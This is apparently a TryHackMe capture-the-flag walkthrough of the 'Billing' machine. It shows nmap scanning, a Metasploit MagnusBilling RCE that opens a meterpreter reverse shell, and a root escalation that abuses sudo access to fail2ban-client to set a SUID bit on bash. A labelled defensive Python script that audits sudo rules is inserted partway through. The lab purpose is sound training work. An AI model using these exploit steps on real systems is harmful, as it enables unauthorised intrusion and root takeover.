
Billing

  • 🌐 Website: TryHackMe
  • 🔥 Level: Easy
  • 🖥️ OS: Linux
  • 🔗 Link: Billing

Foothold

Target: 10.10.153.225

Let's start with an nmap scan of all TCP ports:

nmap --min-rate=10000 10.10.153.225 -p-
Starting Nmap 7.80 ( https://nmap.org ) at 2025-07-02 09:08 BST
Nmap scan report for ip-10-10-153-225.eu-west-1.compute.internal (10.10.153.225)
Host is up (0.00064s latency).
All 65535 scanned ports on ip-10-10-153-225.eu-west-1.compute.internal (10.10.153.225) are filtered
MAC Address: 02:C7:75:C5:29:71 (Unknown)

That did not work: every port shows as filtered. Let's try a SYN scan:

root@ip-10-10-214-237:~# sudo nmap -sS 10.10.153.225
Starting Nmap 7.80 ( https://nmap.org ) at 2025-07-02 09:09 BST
Nmap scan report for ip-10-10-153-225.eu-west-1.compute.internal (10.10.153.225)
Host is up (0.00010s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3306/tcp open  mysql
MAC Address: 02:C7:75:C5:29:71 (Unknown)

There are 3 open ports, and brute force is out of scope. Let's run nmap with default scripts and version detection against them:

root@ip-10-10-214-237:~# sudo nmap -sC -sV -sS 10.10.153.225 -p22,80,3306
Starting Nmap 7.80 ( https://nmap.org ) at 2025-07-02 09:11 BST
Nmap scan report for ip-10-10-153-225.eu-west-1.compute.internal (10.10.153.225)
Host is up (0.00016s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 9.2p1 Debian 2+deb12u6 (protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.62 ((Debian))
| http-robots.txt: 1 disallowed entry 
|_/mbilling/
|_http-server-header: Apache/2.4.62 (Debian)
| http-title:             MagnusBilling        
|_Requested resource was http://ip-10-10-153-225.eu-west-1.compute.internal/mbilling/
3306/tcp open  mysql   MariaDB (unauthorized)
MAC Address: 02:C7:75:C5:29:71 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

There is a robots.txt on the website, and its disallowed entry, /mbilling/, is where the site redirects to. Looking at the website I can see that it is running MagnusBilling. I searched online and found a Metasploit module for an unauthenticated RCE. Let's try it.

User Access

msf6 > search magnus

Matching Modules
================

   #  Name                                                        Disclosure Date  Rank       Check  Description
   -  ----                                                        ---------------  ----       -----  -----------
   0  exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258  2023-06-26       excellent  Yes    MagnusBilling application unauthenticated Remote Command Execution.
   1    \_ target: PHP                                            .                .          .      .
   2    \_ target: Unix Command                                   .                .          .      .
   3    \_ target: Linux Dropper                                  .                .          .      .

Let's use it!

msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > run
[*] Started reverse TCP handler on 10.10.214.237:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 10.10.153.225:80 can be exploited.
[*] Performing command injection test issuing a sleep command of 8 seconds.
[*] Elapsed time: 8.07 seconds.
[+] The target is vulnerable. Successfully tested command injection.
[*] Executing PHP for php/meterpreter/reverse_tcp
[*] Sending stage (40004 bytes) to 10.10.153.225
[+] Deleted kbkUHRIhGAZGeHTh.php
[*] Meterpreter session 1 opened (10.10.214.237:4444 -> 10.10.153.225:57952) at 2025-07-02 09:24:30 +0100

meterpreter > 
meterpreter > shell
Process 2605 created.
Channel 0 created.
whoami
asterisk

Answer

user.txt is in the /home/magnus folder

Privilege Escalation

Let's check whether asterisk can run anything as root:

asterisk@ip-10-10-153-225:/home/magnus$ sudo -l
sudo -l
Matching Defaults entries for asterisk on ip-10-10-153-225:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

Runas and Command-specific defaults for asterisk:
    Defaults!/usr/bin/fail2ban-client !requiretty

User asterisk may run the following commands on ip-10-10-153-225:
    (ALL) NOPASSWD: /usr/bin/fail2ban-client
asterisk@ip-10-10-153-225:/home/magnus$ 
Fail2Ban v1.0.2 reads log file that contains password failure report
and bans the corresponding IP addresses using firewall rules.
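As a defender-side addition (not part of the original writeup), here is a small audit script that parses `sudo -l` output and flags rules like the one above: NOPASSWD access to fail2ban-client hands out root, because its `set <jail> action <name> actionban <cmd>` interface lets the caller choose a command that the root-owned daemon runs. The sample output is the one captured in this room; the COMMAND_RUNNERS table and the function names are my own assumptions.

```python
import re

# Sudo targets whose normal interface lets the caller choose a command that a
# root-owned service then executes. fail2ban-client is the one from this room;
# the table itself is an assumption to be extended per environment.
COMMAND_RUNNERS = {
    "/usr/bin/fail2ban-client": "'set <jail> action <name> actionban <cmd>' is run as root by the daemon",
}

# One rule line as printed by `sudo -l`, e.g. "(ALL) NOPASSWD: /usr/bin/fail2ban-client"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>\S.*)$")


def parse_sudo_l(text):
    """Return (runas_user, nopasswd, command) tuples from the rules section of `sudo -l` output."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True          # rules follow this header; the Defaults lines above are skipped
            continue
        m = RULE_RE.match(line) if in_rules else None
        if not m:
            continue
        runas = m.group("runas").split(":")[0].strip()   # "(ALL : ALL)" -> "ALL"
        nopasswd = "NOPASSWD:" in m.group("tags")
        rules.extend((runas, nopasswd, c.strip()) for c in m.group("cmds").split(","))
    return rules


def audit_sudo_l(text):
    """Flag rules that let the user run, as root, a binary able to execute arbitrary commands."""
    findings = []
    for runas, nopasswd, cmd in parse_sudo_l(text):
        if runas not in ("ALL", "root"):
            continue
        binary = cmd.split()[0]
        if cmd == "ALL":
            findings.append({"command": cmd, "nopasswd": nopasswd, "why": "any command as root"})
        elif binary in COMMAND_RUNNERS:
            findings.append({"command": cmd, "nopasswd": nopasswd, "why": COMMAND_RUNNERS[binary]})
    return findings


# Constructed sample: the `sudo -l` output captured on this box.
SAMPLE_SUDO_L = r"""Matching Defaults entries for asterisk on ip-10-10-153-225:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

Runas and Command-specific defaults for asterisk:
    Defaults!/usr/bin/fail2ban-client !requiretty

User asterisk may run the following commands on ip-10-10-153-225:
    (ALL) NOPASSWD: /usr/bin/fail2ban-client
"""

if __name__ == "__main__":
    for f in audit_sudo_l(SAMPLE_SUDO_L):
        print(f"[!] {f['command']} (NOPASSWD={f['nopasswd']}): {f['why']}")
```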

Let's try to add a command to a fail2ban jail's ban action:

asterisk@ip-10-10-153-225:/var/www/html/mbilling/lib/icepay$ sudo fail2ban-client status
Status
|- Number of jail:  8
`- Jail list:   ast-cli-attck, ast-hgc-200, asterisk-iptables, asterisk-manager, ip-blacklist, mbilling_ddos, mbilling_login, sshd
asterisk@ip-10-10-153-225:/var/www/html/mbilling/lib/icepay$ 
sudo fail2ban-client set sshd action iptables-multiport actionban "/bin/bash -c 'chmod +s /bin/bash'"
sudo fail2ban-client set sshd banip 127.0.0.1
asterisk@ip-10-10-153-225:/var/www/html/mbilling/lib/icepay$ /bin/bash -p
/bin/bash -p
bash-5.2# whoami
whoami
root
bash-5.2# 

Answer

The root flag is in root's home folder.